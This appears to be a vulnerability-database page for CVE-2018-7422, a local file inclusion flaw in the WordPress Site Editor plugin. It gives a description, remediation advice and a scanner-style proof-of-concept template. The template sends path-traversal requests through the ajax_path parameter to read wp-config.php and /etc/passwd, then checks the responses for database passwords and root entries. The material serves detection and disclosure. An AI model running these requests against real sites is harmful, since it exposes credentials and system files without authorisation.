CVE-2018-7422: WordPress Site Editor <=1.1.1 - Local File Inclusion

2025-08-01 WordPress Site Editor PoC Public

Description

WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.

PoC

id: CVE-2018-7422

info:
  name: WordPress Site Editor <=1.1.1 - Local File Inclusion
  author: LuskaBol,0x240x23elu
  severity: high
  description: |
    WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the system.
  remediation: |
    Update WordPress Site Editor plugin to the latest version to mitigate the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/44340
    - http://seclists.org/fulldisclosure/2018/Mar/40
    - https://wpvulndb.com/vulnerabilities/9044
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7422
    - https://github.com/El-Palomo/SYMFONOS
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-7422
    cwe-id: CWE-22
    epss-score: 0.6225
    epss-percentile: 0.99139
    cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: siteeditor
    product: site_editor
    framework: wordpress
  tags: cve2018,cve,wordpress,wp-plugin,lfi,edb,seclists,siteeditor,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
      - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022100ccec8b68775c398cc51678b63888d3e5a1167c05bc1a3c97f45a2402ba515af602203a8b7d528e6bce4f6ac43222a390b92a5b4f9d6e379bbf7cc270c24b1f5ba273:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities